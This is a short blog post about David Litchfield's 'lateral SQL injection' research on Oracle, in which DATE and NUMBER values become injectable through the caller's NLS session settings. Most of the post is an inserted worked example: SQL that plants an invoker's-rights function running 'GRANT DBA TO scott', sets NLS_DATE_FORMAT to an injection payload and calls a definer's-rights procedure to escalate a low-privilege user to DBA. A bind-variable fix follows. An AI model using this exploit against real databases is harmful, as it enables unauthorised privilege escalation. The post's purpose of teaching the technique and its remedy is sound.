Earlier this year David Litchfield published a paper about what he calls lateral SQL injection (PDF), in which he shows how to exploit Oracle PL/SQL procedures that take no user input at all. It's a rather clever bit of work: when a DATE or NUMBER value is concatenated into dynamic SQL, Oracle converts it to text using the calling session's NLS settings (NLS_DATE_FORMAT, NLS_NUMERIC_CHARACTERS), and the caller controls those, so data types normally considered safe from injection are in fact not.
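To make the mechanism concrete, here is an added example of my own, not code from Litchfield's paper or from this post. It assumes Oracle, a definer's-rights procedure DATE_PROC owned by a DBA-privileged schema I'm calling APP_OWNER, and a low-privilege user SCOTT who has only EXECUTE on it; the procedure, function and schema names are all invented for the illustration.

```sql
-- Added example (not from Litchfield's paper or this post).
-- Assumed: APP_OWNER holds the DBA role and owns DATE_PROC (definer's rights,
-- the default); SCOTT has only EXECUTE on it. All names are hypothetical.

-- 1. As APP_OWNER. The procedure takes no parameters, so it looks safe, but the
--    DATE is implicitly converted to text with the CALLER's NLS_DATE_FORMAT
--    when it is concatenated into the dynamic SQL string.
CREATE OR REPLACE PROCEDURE date_proc AS
  stmt VARCHAR2(4000);
  n    PLS_INTEGER;
BEGIN
  stmt := 'SELECT COUNT(*) FROM all_objects WHERE created < ''' || SYSDATE || '''';
  EXECUTE IMMEDIATE stmt INTO n;
END;
/
GRANT EXECUTE ON date_proc TO scott;

-- 2. As SCOTT. An invoker's-rights function with a side effect. When DATE_PROC's
--    dynamic SQL calls it, "current user" is DATE_PROC's definer (APP_OWNER),
--    so the GRANT runs with APP_OWNER's privileges. The autonomous transaction
--    allows DDL from inside a query.
CREATE OR REPLACE FUNCTION get_dba RETURN NUMBER AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  EXECUTE IMMEDIATE 'GRANT DBA TO scott';
  RETURN 1;
END;
/

-- 3. The "lateral" part: no argument is passed, the session's date format is.
--    In a format model, double-quoted text is emitted literally, and inside a
--    SQL string literal '' is one quote, so SYSDATE now renders as:
--        ' OR scott.get_dba()=1--
--    Setting NLS parameters needs no special privilege.
ALTER SESSION SET NLS_DATE_FORMAT = '"'' OR scott.get_dba()=1--"';

-- DATE_PROC now builds and executes:
--   SELECT COUNT(*) FROM all_objects WHERE created < '' OR scott.get_dba()=1--'
-- created < '' is NULL, so the OR branch is evaluated and GET_DBA fires.
BEGIN
  app_owner.date_proc;
END;
/
SELECT granted_role FROM user_role_privs;   -- DBA is now listed for SCOTT

-- 4. Fix, as APP_OWNER: never let a DATE or NUMBER be rendered into SQL text
--    through the session's NLS settings. Bind it instead; the value then never
--    passes through NLS_DATE_FORMAT at all.
CREATE OR REPLACE PROCEDURE date_proc_fixed AS
  n PLS_INTEGER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM all_objects WHERE created < :d' INTO n USING SYSDATE;
END;
/
```

Two caveats worth keeping in mind: the escalation only matters because the procedure runs with its definer's privileges and the injected function is invoker's rights, which is why the GRANT succeeds; and the NUMBER vector is narrower than the DATE one, since NLS_NUMERIC_CHARACTERS only controls the decimal and group separator characters, so it lets an attacker break out of a quoted literal but not smuggle in an arbitrary expression the way a date format model can. Binding (USING) closes both, as does an explicit TO_CHAR with a fixed format mask if you must build the string.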

But what caught my attention was his inspiration:

Whilst watching an episode of ‘Bones,’ something happened in it that made me think of not accepting something believed to be true, i.e., in this case that it’s not possible to SQL inject via DATE or NUMBER data types.

I love it.